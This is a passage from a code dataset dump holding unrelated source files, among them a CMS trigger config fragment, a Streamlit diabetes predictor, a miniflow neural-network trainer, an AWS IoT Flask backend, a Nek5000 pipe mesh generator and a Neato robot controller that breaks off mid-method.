cms.PSet(\n\n ),\n pfClusterBuilder = cms.PSet(\n algoName = cms.string('PFMultiDepthClusterizer'),\n allCellsPositionCalc = cms.PSet(\n algoName = cms.string('Basic2DGenericPFlowPositionCalc'),\n logWeightDenominator = cms.double(0.8),\n minAllowedNormalization = cms.double(1e-09),\n minFractionInCalc = cms.double(1e-09),\n posCalcNCrystals = cms.int32(-1)\n ),\n minFractionToKeep = cms.double(1e-07),\n nSigmaEta = cms.double(2.0),\n nSigmaPhi = cms.double(2.0)\n ),\n positionReCalc = cms.PSet(\n\n )\n)\n","sub_path":"HLTrigger/Configuration/python/HLT_75e33/modules/hltParticleFlowClusterHCALForEgamma_cfi.py","file_name":"hltParticleFlowClusterHCALForEgamma_cfi.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568189028","text":"#!/usr/bin/env python\n##############################################################################\n# Copyright (c) 2017-2018, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n#\n# This file is part of Hatchet.\n# Created by Abhinav Bhatele .\n# LLNL-CODE-741008. 
All rights reserved.\n#\n# For details, see: https://github.com/LLNL/hatchet\n# Please also read the LICENSE file for the MIT License notice.\n##############################################################################\nfrom __future__ import print_function\nimport argparse\n\nfrom hatchet.hpctoolkit_reader import HPCToolkitReader\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='print timings for reading an HPCToolkit database')\n parser.add_argument('directory', metavar='DIRECTORY', action='store',\n help='directory to read')\n args = parser.parse_args()\n\n reader = HPCToolkitReader(args.directory)\n reader.create_graph()\n print(str(reader.timer))\n","sub_path":"examples/time-read.py","file_name":"time-read.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"338429923","text":"\"\"\"\n~~~~~~~~~~~~~~~~~\nweb.handlers.py\n\nImplements handler for apis errors\n~~~~~~~~~~~~~~~~~\n\"\"\"\n\nimport logging\n\nfrom flask import jsonify\n\n\nlogger = logging.getLogger(\"web.handlers\")\n\n\ndef api_error_handler(e):\n \"\"\"Handle all exceptions and generate corresponding response\"\"\"\n message = str(e)\n if len(message) > 0:\n message = message[0].upper() + message[1:]\n message = \"{}.\".format(message) if message[-1] != \".\" else message\n return jsonify({\"message\": message}), e.status\n","sub_path":"web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"561578073","text":"import streamlit as st\nimport base64\nimport numpy as np\nimport pickle\n\n#Design of application UI\nLOGO_IMAGE = \"stingrai-header.jpg\"\n\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True\n)\n\nst.markdown(\n f\"\"\"\n
    \n \n \"\"\",\n unsafe_allow_html=True\n)\n\n\n#Load Logistic Regression Model and define variable\npickle_in = open('Final_logreg_model.pk1','rb') #Load Logistic Regression model\nrf_Model = pickle.load(pickle_in)\n\n\ndef predict_diabetes(number_times_pregnant,plasma_glucose_concentration,diastolic_bp, triceps_skin_fold,\n two_hr_serum_insulin, BMI,diabetes_pedigree_function, age):\n input = np.array([[number_times_pregnant,plasma_glucose_concentration,diastolic_bp, triceps_skin_fold,\n two_hr_serum_insulin, BMI,diabetes_pedigree_function, age]]).astype(np.float64)\n prediction = rf_Model.predict_proba(input)\n pred = '{0:.{1}f}'.format(prediction[0][0], 3)\n result = 1.0-float(pred)\n final_result = '{:.3f}'.format(result)\n print(pred)\n return float(final_result)\n\n\ndef main():\n html_temp = \"\"\"\n
    \n

    Stingr.ai Diabetes Prediction

    \n
    \n \"\"\"\n st.markdown(html_temp,unsafe_allow_html=True)\n number_times_pregnant = st.text_input(\"Number of times pregnant\",\"0\")\n plasma_glucose_concentration = st.text_input(\"Plasma Glucose Concentration\",\"120\")\n diastolic_bp = st.text_input(\"Diastolic Blood Pressure (mm Hg)\",\"70\")\n triceps_skin_fold = st.text_input(\"Triceps Skin Fold Thickness (mm)\",\"10\")\n two_hr_serum_insulin = st.text_input(\"2-Hour Serum Insulin (mu U/ml)\",\"60\")\n BMI = st.text_input(\"Body Mass Index\",\"30\")\n diabetes_pedigree_function = st.text_input(\"Diabetes Pedigree Function\",\"0.320\")\n age = st.text_input(\"Age\",\"25\")\n result = \"\"\n safe_html=\"\"\"\n
    \n

    You're healthy and not at risk of developing diabetes.
    *This is not medical advice, please consult with a medical professional.

    \n
    \n \"\"\"\n danger_html=\"\"\"\n
    \n

    You're at risk of developing diabetes.
    *This is not medical advice, please consult with a medical professional.

    \n
    \n \"\"\"\n\n if st.button(\"Predict\"):\n result=predict_diabetes(number_times_pregnant,plasma_glucose_concentration,diastolic_bp, triceps_skin_fold,\n two_hr_serum_insulin, BMI,diabetes_pedigree_function, age)\n st.success('The probability of developing Type 2 Diabetes is {}'.format(result))\n\n if result > 0.5:\n st.markdown(danger_html,unsafe_allow_html=True)\n else:\n st.markdown(safe_html,unsafe_allow_html=True)\n\nif __name__=='__main__':\n main()\n","sub_path":"StingraiDiabetesPredictor.py","file_name":"StingraiDiabetesPredictor.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"333551739","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('', include('MainApp.urls')),\n path('product/', include('ProductApp.urls')),\n path('order/', include('OrderApp.urls')),\n path('user/', include('UserApp.urls')),\n path('blog/', include('BlogApp.urls')),\n path('admin/', admin.site.urls),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"ProsiddhoBD/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286699546","text":"class Solution:\n \"\"\"\n @param s: A string\n @return: whether the string is a valid parentheses\n \"\"\"\n\n def isValidParentheses(self, s):\n if not s:\n return True\n\n stack = []\n left = ['(', '[', '{']\n\n for char in s:\n if char in left:\n stack.append(char)\n elif len(stack) == 0:\n return False\n else:\n l = stack.pop()\n if l == '(' and char != ')' or l == '[' and char != ']' or l == '{' and char != '}':\n return False\n\n return len(stack) == 0\n","sub_path":"423_Valid Parentheses.py","file_name":"423_Valid Parentheses.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"501812922","text":"import numpy as np\nimport sys\nfrom sklearn.datasets import load_boston\nfrom sklearn.utils import shuffle, resample\nfrom mini_flow import miniflow as mf\n\n# # Add node demo\n#\n# x, y = mf.Input(), mf.Input()\n# f1 = mf.Add(x, y)\n# feed_dict = {x: 10, y: 5}\n#\n# sorted_nodes = mf.topological_sort(feed_dict)\n# output = mf.forward_pass(f1, sorted_nodes)\n#\n# # NOTE: because topological_sort set the values for the `Input` nodes we\n# # could # also access the value for x with x.value (same goes for y).\n# print(\"{0} + {1} = {2} (according to miniflow)\".format(feed_dict[x],\n# feed_dict[y], output))\n\n# # Mul node demo\n#\n# x1, x2, x3, x4, x5 = mf.Input(), mf.Input(), mf.Input(), mf.Input(), mf.Input()\n# f2 = mf.Mul(x1, x2, x3, x4, x5)\n# feed_dict_2 = {x1: 1, x2: 2, x3: 3, x4: 4, x5: 5}\n#\n# sorted_nodes_2 = mf.topological_sort(feed_dict_2)\n# output_2 = mf.forward_pass(f2, sorted_nodes_2)\n#\n# print('5! 
= {0}'.format(output_2))\n\n# # Linear node demo\n#\n# X, W, b = mf.Input(), mf.Input(), mf.Input()\n#\n# f = mf.Linear(X, W, b)\n#\n# X_ = np.array([[-1., -2.], [-1, -2]])\n# W_ = np.array([[2., -3], [2., -3]])\n# b_ = np.array([-3., -5])\n#\n# feed_dict = {X: X_, W: W_, b: b_}\n#\n# graph = mf.topological_sort(feed_dict)\n# output = mf.forward_pass(f, graph)\n#\n# print(output) # should be 12.7 with this example\n\n# # Sigmoid demo\n#\n# X, W, b = mf.Input(), mf.Input(), mf.Input()\n#\n# f = mf.Linear(X, W, b)\n# g = mf.Sigmoid(f)\n#\n# X_ = np.array([[-1., -2.], [-1, -2]])\n# W_ = np.array([[2., -3], [2., -3]])\n# b_ = np.array([-3., -5])\n#\n# feed_dict = {X: X_, W: W_, b: b_}\n#\n# graph = mf.topological_sort(feed_dict)\n# output = mf.forward_pass(g, graph)\n#\n# \"\"\"\n# Output should be:\n# [[ 1.23394576e-04 9.82013790e-01]\n# [ 1.23394576e-04 9.82013790e-01]]\n# \"\"\"\n#\n# print(output)\n\n# # MSE demo\n#\n# y, a = mf.Input(), mf.Input()\n# cost = mf.MSE(y, a)\n#\n# y_ = np.array([1, 2, 3])\n# a_ = np.array([4.5, 5, 10])\n#\n# feed_dict = {y: y_, a: a_}\n# graph = mf.topological_sort(feed_dict)\n# # forward pass\n# mf.forward_pass(graph)\n#\n# \"\"\"\n# Expected output\n#\n# 23.4166666667\n# \"\"\"\n# print(cost.value)\n\n# Backpropagation demo\n#\n# X, W, b = mf.Input(), mf.Input(), mf.Input()\n# y = mf.Input()\n# f = mf.Linear(X, W, b)\n# a = mf.Sigmoid(f)\n# cost = mf.MSE(y, a)\n#\n# X_ = np.array([[-1., -2.], [-1, -2]])\n# W_ = np.array([[2.], [3.]])\n# b_ = np.array([-3.])\n# y_ = np.array([1, 2])\n#\n# feed_dict = {X: X_, y: y_, W: W_, b: b_ }\n#\n# graph = mf.topological_sort(feed_dict)\n# mf.forward_and_backward(graph)\n# # return the gradients for each Input\n# gradients = [t.gradients[t] for t in [X, y, W, b]]\n#\n# \"\"\"\n# Expected output\n#\n# [array([[ -3.34017280e-05, -5.01025919e-05],\n# [ -6.68040138e-05, -1.00206021e-04]]), array([[ 0.9999833],\n# [ 1.9999833]]), array([[ 5.01028709e-05],\n# [ 1.00205742e-04]]), array([ -5.01028709e-05])]\n# \"\"\"\n# print(gradients)\n\n\"\"\"\nCheck out the new network architecture and dataset!\n\nNotice that the weights and biases are\ngenerated randomly.\n\nNo need to change anything, but feel free to tweak\nto test your network, play around with the epochs, batch size, etc!\n\"\"\"\n\n# Load data\ndata = load_boston()\nX_ = data['data']\ny_ = data['target']\n\n# Normalize data\nX_ = (X_ - np.mean(X_, axis=0)) / np.std(X_, axis=0)\n\nn_features = X_.shape[1]\nn_hidden = 10\nW1_ = np.random.randn(n_features, n_hidden)\nb1_ = np.zeros(n_hidden)\nW2_ = np.random.randn(n_hidden, 1)\nb2_ = np.zeros(1)\n\n# Neural network\nX, y = mf.Input(), mf.Input()\nW1, b1 = mf.Input(), mf.Input()\nW2, b2 = mf.Input(), mf.Input()\n\nl1 = mf.Linear(X, W1, b1)\ns1 = mf.Sigmoid(l1)\nl2 = mf.Linear(s1, W2, b2)\ncost = mf.MSE(y, l2)\n\nfeed_dict = {X: X_,\n y: y_,\n W1: W1_,\n b1: b1_,\n W2: W2_,\n b2: b2_\n }\n\nepochs = 1024\n# Total number of examples\nm = X_.shape[0]\nbatch_size = 32\nsteps_per_epoch = m // batch_size\n\ngraph = mf.topological_sort(feed_dict)\ntrainables = [W1, b1, W2, b2]\n\nprint(\"Total number of examples = {}\".format(m))\n\n# Step 4\nfor i in range(epochs):\n loss = 0\n for j in range(steps_per_epoch):\n # Step 1\n # Randomly sample a batch of examples\n X_batch, y_batch = resample(X_, y_, n_samples=batch_size)\n\n # Reset value of X and y Inputs\n X.value = X_batch\n y.value = y_batch\n\n # Step 2\n mf.forward_and_backward(graph)\n\n # Step 3\n mf.sgd_update(trainables, learning_rate=0.01)\n\n loss += 
graph[-1].value\n\n sys.stdout.write(\"\\rEpoch: {0}, Loss: {1:.4f}\".format(i + 1,\n loss/steps_per_epoch))\n","sub_path":"mini-flow/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226789057","text":"\"\"\"\nOne way to improve the quicksort is to use an insertion sort on lists that are small in length\n(call it the “partition limit”). Why does this make sense?\nRe-implement the quicksort and use it to sort a random list of integers.\nPerform analysis using different list sizes for the partition limit.\n\"\"\"\n\n\ndef partition(nums, low, high):\n # Мы выбираем средний элемент, в качестве опорного\n pivot = nums[(low + high) // 2]\n i = low - 1\n j = high + 1\n while True:\n i += 1\n while nums[i] < pivot:\n i += 1\n\n j -= 1\n while nums[j] > pivot:\n j -= 1\n\n if i >= j:\n return j\n\n # Если элемент в i (слева от оси) больше, чем элемент в j (справа от оси), то поменять их местами\n nums[i], nums[j] = nums[j], nums[i]\n\n\ndef quick_sort(nums):\n # Создаем вспомогательную рекурсивную функцию\n def _quick_sort(items, low, high):\n if low < high:\n # Это индекс после опорного элемента, по которому наши списки разделены\n split_index = partition(items, low, high)\n _quick_sort(items, low, split_index)\n _quick_sort(items, split_index + 1, high)\n\n _quick_sort(nums, 0, len(nums) - 1)\n\n\n# Проверка, что всё работает\nrandom_list_of_nums = [50, 12, 23, 5, 40, 33, 18, 1, 2, 98]\nquick_sort(random_list_of_nums)\nprint(random_list_of_nums)\n","sub_path":"homework/topic_27_sorting_algorithms/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"183507627","text":"from matplotlib import pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus']=False #用来正常显示负号\na = [\"战狼2\",\"速度与激情8\",\"功夫瑜伽\",\"西游伏妖篇\",\"变形金刚5\",\"摔跤吧爸爸\",\"加勒比海盗5\",\"金刚\",\"极限特工\",\"生化危机6\",\"乘风破浪\",\"绳头奶爸\",\"智取威虎山\",\"大拿天竺\",\"今年刚狼3\",\"指数下\",\"悟空传\",\"迎合护卫队 \",\"轻声\",\"新木乃伊\"]\nb = [56.01,26.94,17.53,49,15.45,12.96,11.8,11.61,11.28,11.12,10.49,10.3,8.75,7.55,7.32,6.99,6.88,6.86,6.58,6.23]\n\n#设置图形大小\nplt.figure(figsize=(20,15),dpi=80)\n\n# 绘制条形图\n#plt.bar(range(len(a)),b,width=0.3)#绘制竖形条形图\nplt.barh(range(len(a)),b,height=0.3,color=\"orange\")#绘制横形条形图\n#rotitian指的是字体旋转的角度\n#plt.xticks(range(len(a)),a,rotation=90)\nplt.yticks(range(len(a)),a)\nplt.grid(alpha=0.3)\nplt.show()\n","sub_path":"machine learning/Matlab/绘制条形图.py","file_name":"绘制条形图.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"176086206","text":"'''\n* CSE520 Real-Time Systems\n* UI Backend flask server\n* Jeremy Manin, Justin Marshall\n*\n* usage: (with FLASK_APP env var set to \"backend.py\") flask run\n'''\n\n# Import utility libraries\nimport json\nimport logging\nimport threading\nimport time\n# Import flask libraries\nfrom flask import Flask\nfrom flask_cors import CORS\n# Import AWS IoT library\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\n# Import backend subscription thread\nimport backend_sub\n\n# Flask setup\napp = Flask(__name__)\nCORS(app)\n\n# AWS IoT Setup\n## Connection settings\nhost = \"an91x6ytmr3ss-ats.iot.us-east-2.amazonaws.com\"\nrootCAPath = \"../../certs/root-CA.crt\"\ncertificatePath = 
\"../../certs/2db4660fce-certificate.pem.crt\"\nprivateKeyPath = \"../../certs/2db4660fce-private.pem.key\"\nport = 8883\nclientId = \"back_end_pub\"\ncontrolTopic = \"$aws/things/cloud_control/shadow/update\"\n\n## Configure logging\nlogger = logging.getLogger(\"AWSIoTPythonSDK.core\")\nlogger.setLevel(logging.ERROR)\nstreamHandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nstreamHandler.setFormatter(formatter)\nlogger.addHandler(streamHandler)\n\n## Init AWSIoTMQTTClient\nmyAWSIoTMQTTClient = AWSIoTMQTTClient(clientId)\nmyAWSIoTMQTTClient.configureEndpoint(host, port)\nmyAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)\n\n## AWSIoTMQTTClient connection configuration\nmyAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)\nmyAWSIoTMQTTClient.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing\nmyAWSIoTMQTTClient.configureDrainingFrequency(2) # Draining: 2 Hz\nmyAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec\nmyAWSIoTMQTTClient.configureMQTTOperationTimeout(5) # 5 sec\n\n## Connect to AWS IoT\nmyAWSIoTMQTTClient.connect()\ntime.sleep(2)\n\n# Create thread object for backend subwscription service\nclass sub_thread (threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n def run(self):\n backend_sub.start_sub()\n\n# Subscribe Start - Starts up backend subscription service\n@app.route(\"/subscribe-start\")\ndef start_subscribe():\n my_sub_thread = sub_thread()\n my_sub_thread.start()\n return('Subscription thread started')\n\n# Cloud Start - Sends cloud control topic to get gesture from glove\n@app.route(\"/cloud-start\")\ndef start_cloud():\n # Build and publish control topic telling cloud to start\n message = {}\n message['state'] = {}\n message['state']['reported'] = {}\n message['state']['reported']['command'] = 'start'\n messageJson = json.dumps(message)\n myAWSIoTMQTTClient.publish(controlTopic, messageJson, 1)\n \n # Return success\n return('Cloud control topic successfully published')\n\nif __name__ == '__main__':\n app.run(debug=True, use_reloader=True)\n","sub_path":"web-app/backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372397106","text":"#!/usr/bin/env python3.5\n# This python script is inspired by pipeMeshNek.f90 from Jacopo Canton.\n# However, I am not that familiar with Fortran 90 and I wanted to \n# improve my python skills and understand the mesh generation better.\n# Hence, I rewrite the code from scratch\n#oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n# Steffen Straub\n# 2017-02-08\n#oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n\n## Import modules\n#----------------------------------------------------------------------\nimport nek_utils\nimport numpy as np\nimport math as m\nimport my_math\nimport elementclass \nimport pdb\nimport sys\nimport re\n\n# Input Variables\n#----------------------------------------------------------------------\n# Radius\nR = 0.5\n# Number of elements in radial direction\nnR = 15\n# Number of elements along one side of the \"square\" region\nnSq = 10\n# Length of the pipe in streamwise (z) direction\nL_z = 5.00\n# Number of elements in streamwise (z) direction\nnZ = 60\n\n# Type of thermal BC\nth_bc_type = 't '\n\n# In order to check the resolution requirements\nN = 9 # Polynomial 
order\nRe_t = 720 # Friction Reynolds number\n\n# Do you want thermal boundary conditions? \n# \"True\" or \"False\"\nif_therm = False\n\n\n\n# Some Input for tuning the mesh\n#----------------------------------------------------------------------\n\n# Stretch nominal value of dr in square by this factor\nstretch_sq = 1.10\n# Min to max element length along axis in square\ndr_sq_ratio = 0.8 \n\n# Ratio of min to max element of x (resp. y) component along intersection\n# Note that this is not the real length but its projection along x-, \n# respective y-axis\ndr_sq_int_ratio = 0.8 \n# First xx in onion region is increasing and (xx-1) is decreasing\ndistri_on = 0.5 \n\n# Semi-major axis at the interface betwenn square and onion region\n# Note: semi-minor axis is defined by position of element along y-axis\n#a_interf = 0.57\na_interf = 0.60\n\n# Keep the outermost onion layer constant: \n# 0 = not const., 1 = const.\ntog_r_out_const = 0\n# Use exp. or sin distribution for semi-major axis in onion region\n# exp gives a sharper decrease, hence more circle like shape in \n# the first onion layers, which can be good for low Re-flows with few\n# elements in onion region. For higher Re and more elements in onion \n# region \"sin\" is recommended\n# 0 = exp, 1 = sin, 2 = linear\ntog_a_on_dist = 1\n\n\n\n## 0: Check if input variables are OK\n#----------------------------------------------------------------------\nnek_utils.check_input(nR, nSq, nZ, R, L_z, th_bc_type, N, Re_t,\\\n if_therm)\n\n\n\n# Define some global variables here:\n#----------------------------------------------------------------------\ndr_nominal = R/nR # nominal length of one element\ndr = dr_nominal\ndz = L_z/nZ\n\nel_list = [] # list of all elements\n# number of elements in one cross section\nnel_quarter = (nSq**2+(nR-nSq)*nSq*2)\nnel_cross_section = nel_quarter*4 \n\nnumber = 1\n# Populate list of elements: first, the square region\nfor i in range(nSq):\n for j in range(nSq):\n el = elementclass.Element()\n el.number = number\n# el.c = np.zeros(4)\n el_list.append(el)\n number = number + 1\n# Populate list of elements: second, the curved region outside (onion region)\nfor i in range(nR-nSq): # loop through each onion like layer outwards\n for j in range(nSq*2): # loop in clockwise direction through each layer\n el = elementclass.Element()\n el.number = number\n# el.c = np.zeros(4)\n el_list.append(el)\n number = number + 1\n\n\n\n\n## A: Generate the mesh\n#----------------------------------------------------------------------\n## A.1: Generate the mesh for a quarter section\n#----------------------------------------------------------------------\n## A.1.1: Set vertex positions of elements\n# (This is the essential part of the code)\n#----------------------------------------------------------------------\nnek_utils.set_vertices(el_list, nR, nSq, dr, dz, dr_sq_ratio,\\\n dr_sq_int_ratio, stretch_sq, distri_on, a_interf,\\\n tog_r_out_const, tog_a_on_dist)\n\n## A.1.2: Set boundary conditions for faces \n#----------------------------------------------------------------------\n#nek_utils.set_bc_q1(el_list,nR,nSq)\n\n\n## A.2: Generate the complete mesh \n#----------------------------------------------------------------------\n## A.2.1: Set vertex positions\n#----------------------------------------------------------------------\nnek_utils.compl_mesh(el_list,nR,nSq)\nnek_utils.extrude(el_list,nR,nSq,nZ,dz)\n\n\n## A.2.2: Set boundary conditions\n# (for each quarter 
separately)\n#----------------------------------------------------------------------\nnek_utils.set_bc_q1(el_list,nR,nSq,th_bc_type)\nnek_utils.set_bc_q2(el_list,nR,nSq,th_bc_type)\nnek_utils.set_bc_q3(el_list,nR,nSq,th_bc_type)\nnek_utils.set_bc_q4(el_list,nR,nSq,th_bc_type)\n\n\n## B: Write the mesh to rea file\n#----------------------------------------------------------------------\n# generate a rea skeleton file\n#----------------------------------------------------------------------\nnek_utils.rea_skel(2, if_therm, 'base2d.rea')\nnek_utils.rea_skel(3, if_therm, 'base3d.rea')\n## B.1: Write vertex positions\n#----------------------------------------------------------------------\nnek_utils.write_mesh(el_list, nR, nSq, 2, 'base2d.rea')\nnek_utils.write_mesh(el_list, nR, nSq, 3, 'base3d.rea')\n## B.2: Write curved edges\n#----------------------------------------------------------------------\nnek_utils.write_curv(el_list, nR, nSq, 2, 'base2d.rea')\nnek_utils.write_curv(el_list, nR, nSq, 3, 'base3d.rea')\n## B.3: Write boundary conditions\n#----------------------------------------------------------------------\nnek_utils.write_fl_bc(el_list, nR, nSq, 2, 'base2d.rea')\nnek_utils.write_fl_bc(el_list, nR, nSq, 3, 'base3d.rea')\nif (if_therm):\n nek_utils.write_th_bc(el_list, nR, nSq, 2, 'base2d.rea')\n nek_utils.write_th_bc(el_list, nR, nSq, 3, 'base3d.rea')\n\n## C: Do some checks and write a little output\n#----------------------------------------------------------------------\nnek_utils.dump_input_vars(R, nR, nSq, nZ, L_z, N, Re_t, stretch_sq,\\\n dr_sq_ratio, dr_sq_int_ratio, distri_on, a_interf,\\\n tog_r_out_const, tog_a_on_dist)\n\nnek_utils.check_mesh_quality(el_list, nR, nSq, nZ, R, L_z, N, Re_t)\n","sub_path":"GenPipeMesh.py","file_name":"GenPipeMesh.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"1777237","text":"import os\n\nfrom werckercli.tests import (\n DataSetTestCase,\n TempHomeSettingsCase,\n)\n\nfrom werckercli.paths import (\n find_git_root,\n get_global_wercker_path,\n WERCKER_FOLDER_NAME,\n WERCKER_CREDENTIALS_FILE,\n get_global_wercker_filename,\n check_or_create_path\n)\n\n\nclass GitFindRepoTests(DataSetTestCase):\n repo_name = 'subfolders'\n\n def test_find_git_root_in_same_folder(self):\n result = find_git_root(\n os.path.join(\n self.folder,\n self.repo_name\n ),\n self.get_git_folder()\n )\n self.assertFalse(result is None)\n\n def test_find_git_root_from_subfolder(self):\n # self.assertTrue(False)\n new_folder = os.path.join(\n self.folder,\n self.repo_name,\n # self.get_git_folder(),\n \"multiple\",\n \"subfolders\",\n \"and\",\n \"it\",\n \"still\"\n )\n\n result = find_git_root(new_folder, self.get_git_folder())\n\n self.assertFalse(result is None)\n\n def test_find_git_root_from_curdir(self):\n # print os\n # print os.getcwd()\n # current_dir = os.getcwd()\n\n os.chdir(self.get_home_folder())\n os.mkdir('.git')\n result = find_git_root(os.curdir)\n\n self.assertTrue(result)\n\n # os.chdir(current_dir)\n\n def test_no_matching_parent(self):\n result = find_git_root(\n self.get_home_folder(),\n folder_name=\"this_folder_must_not_exist.\"\n )\n\n self.assertFalse(result)\n\n\nclass WerckerSettingsPathTests(TempHomeSettingsCase):\n\n def test_get_global_wercker_path(self):\n\n result = get_global_wercker_path()\n\n self.assertFalse(result is None)\n self.assertTrue(result.startswith(self.get_home_folder()))\n 
self.assertTrue(result.endswith(WERCKER_FOLDER_NAME))\n\n\nclass WerckerGlobalFilenameTests(TempHomeSettingsCase):\n\n def test_get_global_filename(self):\n\n result = get_global_wercker_filename()\n\n self.assertTrue(result.endswith(WERCKER_CREDENTIALS_FILE))\n\n\nclass WerckerGetOrCreateTests(TempHomeSettingsCase):\n\n def test_create(self):\n\n result = check_or_create_path(\n os.path.join(\n self.get_home_folder(),\n 'test-folder'\n )\n )\n\n self.assertTrue(result)\n\n def test_create_multiple_levels(self):\n\n result = check_or_create_path(\n os.path.join(\n self.get_home_folder(),\n 'test-folder',\n 'subfolder'\n )\n )\n\n self.assertTrue(result)\n","sub_path":"werckercli/tests/test_paths.py","file_name":"test_paths.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"514956669","text":"from test_NeatoCommands import envia\nfrom neatoOdometry import NeatoOdometry\nfrom Laser_code import NeatoLaser\nfrom multiprocessing import Process, Queue\nimport threading\nimport time\nimport math\nimport http_viewer\n\nclass NeatoRobot:\n north = 0\n distance = 540\n speed = 120\n direction = 0 #0 fordward, 1 backward\n theta = 0\n tiempo = 20\n S = 121.5\n\n def __init__(self, ser):\n self.ser = ser\n envia(self.ser, 'TestMode On', 0.2)\n envia(self.ser, 'PlaySound 1', 0.2)\n envia(self.ser, \"SetMotor LWheelEnable RWheelEnable\", 0.2)\n envia(self.ser, 'SetLDSRotation On', 2)\n self.laser = NeatoLaser(ser)\n \n self.exit = False\n \n self.pose_queue = Queue()\n self.laser_queue = Queue()\n \n self.viewer = http_viewer.HttpViewer(8002, self.laser_queue, self.pose_queue)\n \n L_read, R_read = self.__get_motors()\n self.odometry = NeatoOdometry(L_read, R_read)\n \n self.thread_odometry = threading.Thread(target=self.__odometry_queue)\n self.thread_odometry.start()\n \n def __odometry_queue(self):\n while not self.exit:\n current_odometry = self.odometry.getTheoricPose()\n self.pose_queue.put([(current_odometry[0][0], current_odometry[1][0])])\n time.sleep(0.5)\n \n def __send_lasercoords(self, lasercoords):\n current_odometry = self.odometry.getTheoricPose()\n coords_real = []\n for i in range(len(lasercoords)):\n coords_real.append(self.__val_to_coord(lasercoords[i], i, current_odometry))\n self.laser_queue.put(coords_real)\n \n def Goto(self, x, y):\n print(\"Going to point\")\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n while (L+R) > 0:\n comando = 'SetMotor LWheelDist ' + str(L) + ' RWheelDist ' + str(R) + ' Speed ' + str(self.speed)\n self.enviaR(comando, 0.1)\n L_read, R_read = self.__get_motors()\n self.odometry.updateOdometry(L_read, R_read)\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n self.enviaR(comando, 0.1)\n \n def GotoObstacles(self, x, y):\n print(\"Going to point without crashing\")\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n while ((L+R) > 0):\n if not self.__esquiva():\n comando = 'SetMotor LWheelDist ' + str(L) + ' RWheelDist ' + str(R) + ' Speed ' + str(self.speed)\n self.enviaR(comando, 0.1)\n\n L_read, R_read = self.__get_motors()\n self.odometry.updateOdometry(L_read, R_read)\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n self.enviaR(comando, 0.1) \n \n def __get_motors(self):\n msg = self.enviaR('GetMotors LeftWheel RightWheel', 0.1).split('\\n')\n \n L = int(msg[4].split(',')[1])\n R = int(msg[8].split(',')[1])\n \n 
